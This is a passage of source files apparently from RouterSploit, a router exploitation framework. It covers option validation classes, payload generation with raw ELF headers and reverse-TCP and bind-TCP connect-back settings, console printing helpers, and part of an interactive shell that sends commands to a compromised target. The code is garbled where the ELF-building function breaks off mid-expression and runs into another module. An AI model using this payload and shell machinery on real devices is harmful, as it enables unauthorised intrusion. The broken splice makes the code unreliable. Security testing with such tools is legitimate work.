LockedIterator: def __init__(self, it): self.lock = threading.Lock() self.it = it.__iter__() def __iter__(self): return self def next(self): self.lock.acquire() try: item = next(self.it) if isinstance(item, tuple): return (item[0].strip(), item[1].strip()) elif isinstance(item, str): return item.strip() return item finally: self.lock.release() ================================================ FILE: routersploit/core/exploit/option.py ================================================ import re import os.path from routersploit.core.exploit.exceptions import OptionValidationError from routersploit.core.exploit.utils import ( is_ipv4, is_ipv6, ) # pylint: disable=no-member class Option: """ Exploit attribute that is set by the end user """ def __init__(self, default, description="", advanced=False): self.label = None self.description = description try: self.advanced = bool(advanced) except ValueError: raise 
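OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced))

        if default or default == 0:
            self.__set__("", default)
        else:
            self.display_value = ""
            self.value = ""

    def __get__(self, instance, owner):
        return self.value


class OptIP(Option):
    """ Option IP attribute """

    def __set__(self, instance, value):
        # An empty value is accepted so the option can be left unset.
        if not value or is_ipv4(value) or is_ipv6(value):
            self.value = self.display_value = value
        else:
            raise OptionValidationError("Invalid address. Provided address is not valid IPv4 or IPv6 address.")


class OptPort(Option):
    """ Option Port attribute """

    def __set__(self, instance, value):
        try:
            port = int(value)
        except (TypeError, ValueError):
            # TypeError covers values int() cannot take at all (e.g. None),
            # so they are reported as a validation error as well.
            raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value))

        if not 0 < port <= 65535:  # max port number is 65535
            raise OptionValidationError("Invalid option. Port value should be between 0 and 65536.")

        self.display_value = str(port)
        self.value = port


class OptBool(Option):
    """ Option Bool attribute """

    def __init__(self, default, description="", advanced=False):
        self.description = description

        if default:
            self.display_value = "true"
        else:
            self.display_value = "false"

        self.value = default

        try:
            self.advanced = bool(advanced)
        except ValueError:
            raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced))

    def __set__(self, instance, value):
        # Only the exact strings "true" and "false" are accepted.
        if value == "true":
            self.value = True
            self.display_value = value
        elif value == "false":
            self.value = False
            self.display_value = value
        else:
            raise OptionValidationError("Invalid value. It should be true or false.")


class OptInteger(Option):
    """ Option Integer attribute """

    def __set__(self, instance, value):
        # Parse first and assign afterwards, so a rejected value never leaves
        # display_value out of step with value.
        try:
            parsed = int(value)
        except (TypeError, ValueError):
            try:
                parsed = int(value, 16)  # fall back to hexadecimal input
            except (TypeError, ValueError):
                raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value))

        self.display_value = str(value)
        self.value = parsed


class OptFloat(Option):
    """ Option Float attribute """

    def __set__(self, instance, value):
        # Parse first and assign afterwards, so a rejected value never leaves
        # display_value out of step with value.
        try:
            parsed = float(value)
        except (TypeError, ValueError):
            raise OptionValidationError("Invalid option. Cannot cast '{}' to float.".format(value))

        self.display_value = str(value)
        self.value = parsed


class OptString(Option):
    """ Option String attribute """

    def __set__(self, instance, value):
        try:
            self.value = self.display_value = str(value)
        except ValueError:
            raise OptionValidationError("Invalid option. Cannot cast '{}' to string.".format(value))


class OptMAC(Option):
    """ Option MAC attribute """

    def __set__(self, instance, value):
        # Six colon-separated groups of one or two hex digits. fullmatch
        # rejects a trailing newline, which "$" with re.match would accept,
        # and re.ASCII limits \d to 0-9.
        regexp = r"[a-f\d]{1,2}(?::[a-f\d]{1,2}){5}"

        if isinstance(value, str) and re.fullmatch(regexp, value.lower(), re.ASCII):
            self.value = self.display_value = value
        else:
            raise OptionValidationError("Invalid option. '{}' is not a valid MAC address".format(value))


class OptWordlist(Option):
    """ Option Wordlist attribute

    The value is either a comma-separated list of words or a ``file://<path>``
    reference to a file holding one word per line.
    """

    def __get__(self, instance, owner):
        if self.display_value.startswith("file://"):
            # Strip the scheme prefix only; str.replace would also remove
            # any later "file://" inside the path.
            path = self.display_value[len("file://"):]
            # The file is opened on every read of the option. Its existence
            # is checked when the option is set, not here, so open() can
            # still raise if the file has gone away in the meantime.
            with open(path, "r") as f:
                return [line.strip() for line in f]

        return self.display_value.split(",")

    def __set__(self, instance, value):
        if value.startswith("file://"):
            path = value[len("file://"):]
            if not os.path.exists(path):
                raise OptionValidationError("File '{}' does not exist.".format(path))

        self.value = self.display_value = value


class OptEncoder(Option):
    """ Option Encoder attribute """

    def __init__(self, default, description="", advanced=False):
        self.description = description

        if default:
            self.display_value = default
            self.value = default
        else:
            self.display_value = ""
            self.value = None

        try:
            self.advanced = bool(advanced)
        except ValueError:
            raise OptionValidationError("Invalid value.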
Cannot cast '{}' to boolean.".format(advanced)) def __set__(self, instance, value): encoder = instance.get_encoder(value) if encoder: self.value = encoder self.display_value = value else: raise OptionValidationError("Encoder not available. Check available encoders with `show encoders`.") ================================================ FILE: routersploit/core/exploit/payloads.py ================================================ import importlib from collections import namedtuple from struct import pack from routersploit.core.exploit.exploit import ( BaseExploit, ExploitOptionsAggregator, ) from routersploit.core.exploit.option import ( OptIP, OptPort, OptString, ) from routersploit.core.exploit.exceptions import OptionValidationError from routersploit.core.exploit.printer import ( print_status, print_error, print_success, print_info, ) from routersploit.core.exploit.utils import ( index_modules, random_text, ) architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64", "PERL", "PHP", "PYTHON"]) Architectures = architectures( ARMLE="armle", MIPSBE="mipsbe", MIPSLE="mipsle", X86="x86", X64="x64", PERL="perl", PHP="php", PYTHON="python", ) payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"]) PayloadHandlers = payload_handlers( BIND_TCP="bind_tcp", REVERSE_TCP="reverse_tcp", ) ARCH_ELF_HEADERS = { Architectures.ARMLE: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" b"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.MIPSBE: ( b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34" b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00" 
b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00" b"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07" b"\x00\x00\x10\x00" ), Architectures.MIPSLE: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00" b"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.X86: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08" b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.X64: ( b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00" b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00" b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00" b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42" b"\x00\x10\x00\x00\x00\x00\x00\x00" ) } class ReverseTCPPayloadMixin(metaclass=ExploitOptionsAggregator): handler = PayloadHandlers.REVERSE_TCP lhost = OptIP('', 'Connect-back IP address') lport = OptPort(5555, 'Connect-back TCP Port') class BindTCPPayloadMixin(metaclass=ExploitOptionsAggregator): handler = PayloadHandlers.BIND_TCP rport = OptPort(5555, 'Bind Port') class BasePayload(BaseExploit): architecture = None handler = None encoder = OptString("", "Encoder") fmt = None def __init__(self): if self.handler not in PayloadHandlers: raise OptionValidationError( 
"Please use one of valid payload handlers: {}".format( PayloadHandlers._fields ) ) def generate(self): raise NotImplementedError("Please implement 'generate()' method") def run(self): raise NotImplementedError() def get_encoders(self): encoders = [] # get all encoders for given architecture all_encoders = [e for e in index_modules() if "encoders.{}".format(self.architecture) in e] for e in all_encoders: encoder = e.replace("encoders.{}.".format(self.architecture), "").replace(".", "/") module = getattr(importlib.import_module('routersploit.modules.' + e), "Encoder") encoders.append(( "{}/{}".format(self.architecture, encoder), module._Encoder__info__["name"], module._Encoder__info__["description"], )) return encoders def get_encoder(self, encoder): module_path = "routersploit/modules/encoders/{}".format(encoder).replace("/", ".") try: module = getattr(importlib.import_module(module_path), "Encoder") except ImportError: return None return module() class ArchitectureSpecificPayload(BasePayload): output = OptString("python", "Output type: elf/c/python") filepath = OptString("/tmp/{}".format(random_text(8)), "Output file to write") def __init__(self): super(ArchitectureSpecificPayload, self).__init__() if self.architecture not in Architectures: raise OptionValidationError( "Please use one of valid payload architectures: {}".format( Architectures._fields ) ) self.header = ARCH_ELF_HEADERS[self.architecture] self.bigendian = True if self.architecture.endswith("be") else False def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, "wb+") as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": 
print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError( "No such option as {}".format(self.output) ) return content def generate_elf(self, data): elf = self.header + data if elf[4] == 1: # ELFCLASS32 - 32 bit if self.bigendian: p_filesz = pack(">L", len(elf)) p_memsz = pack(">L", len(elf) + len(data)) else: p_filesz = pack("Q", len(elf)) p_memsz = pack(">Q", len(elf) + len(data)) else: p_filesz = pack(" None: """ Print error message prefixing it with [-] """ __cprint("\033[91m[-]\033[0m", *args, **kwargs) def print_status(*args, **kwargs) -> None: """ Print status message prefixing it with [-] """ __cprint("\033[94m[*]\033[0m", *args, **kwargs) def print_success(*args, **kwargs) -> None: """ Print success message prefixing it with [-] """ __cprint("\033[92m[+]\033[0m", *args, **kwargs) def print_info(*args, **kwargs) -> None: """ Print info message prefixing it with [-] """ __cprint(*args, **kwargs) def print_table(headers, *args, **kwargs) -> None: """ Print table. example: Name Current setting Description ---- --------------- ----------- option_name value description foo bar baz foo bar baz :param headers: Headers names ex.('Name, 'Current setting', 'Description') :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ... 
:param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content :return: """ extra_fill = kwargs.get("extra_fill", 5) header_separator = kwargs.get("header_separator", "-") if not all(map(lambda x: len(x) == len(headers), args)): print_error("Headers and table rows tuples should be the same length.") return def custom_len(x): try: return len(x) except TypeError: return 0 fill = [] headers_line = ' ' headers_separator_line = ' ' for idx, header in enumerate(headers): column = [custom_len(arg[idx]) for arg in args] column.append(len(header)) current_line_fill = max(column) + extra_fill fill.append(current_line_fill) headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill))) headers_separator_line = "".join(( headers_separator_line, "{:<{}}".format(header_separator * len(header), current_line_fill) )) print_info() print_info(headers_line) print_info(headers_separator_line) for arg in args: content_line = " " for idx, element in enumerate(arg): content_line = "".join(( content_line, "{:<{}}".format(str(element), fill[idx]) )) print_info(content_line) print_info() def pprint_dict_in_order(dictionary, order=None) -> None: """ Pretty dict print. Pretty printing dictionary in specific order. (as in 'show info' command) Keys not mentioned in *order* parameter will be printed in random order. ex. 
pprint_dict_in_order({'name': John, 'sex': 'male', "hobby": ["rugby", "golf"]}, ('sex', 'name')) Sex: male Name: John Hobby: - rugby - golf """ order = order or () def prettyprint(title, body): print_info("\n{}:".format(title.capitalize())) if not isinstance(body, str): for value_element in body: print_info("- ", value_element) else: print_info(body) keys = list(dictionary.keys()) for element in order: try: key = keys.pop(keys.index(element)) value = dictionary[key] except (KeyError, ValueError): pass else: prettyprint(element, value) for rest_keys in keys: prettyprint(rest_keys, dictionary[rest_keys]) def color_blue(string: str) -> str: """ Returns string colored with blue :param str string: :return str: """ return "\033[94m{}\033[0m".format(string) def color_green(string: str) -> str: """ Returns string colored with green :param str string: :return str: """ return "\033[92m{}\033[0m".format(string) def color_red(string: str) -> str: """ Returns string colored with red :param str string: :return str: """ return "\033[91m{}\033[0m".format(string) ================================================ FILE: routersploit/core/exploit/shell.py ================================================ try: import telnetlib except ImportError: import telnetlib3 as telnetlib import socket import binascii from http.server import BaseHTTPRequestHandler, HTTPServer import threading import time import importlib from routersploit.core.exploit.printer import ( printer_queue, print_info, print_error, print_success, print_status, print_table, ) from routersploit.core.exploit.utils import ( index_modules, random_text, ) def shell(exploit, architecture="", method="", payloads=None, **params): available_payloads = {} payload = None options = [] if architecture and method: # get all payloads for given architecture all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p] for p in all_payloads: module = 
getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload") # if method/arch is cmd then filter out payloads if method == "cmd": if getattr(module, "cmd") in payloads: available_payloads[p] = module else: available_payloads[p] = module print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("For further exploitation use 'show payloads' and 'set payload ' commands.") print_info() while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"]) cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": if not available_payloads: print_error("There are no available payloads for this exploit") continue print_status("Available payloads:") headers = ("Payload", "Name", "Description") data = [] for p, v in available_payloads.items(): data.append((p, v._Payload__info__["name"], v._Payload__info__["description"])) print_table(headers, *data) elif cmd.startswith("set payload "): if not available_payloads: print_error("There are no available payloads for this exploit") continue c = cmd.split(" ") if c[2] in available_payloads.keys(): payload = available_payloads[c[2]]() options = [] for option, attr in payload.exploit_attributes.items(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), attr[1]]) if payload.handler == "bind_tcp": options.append(["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) 
print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set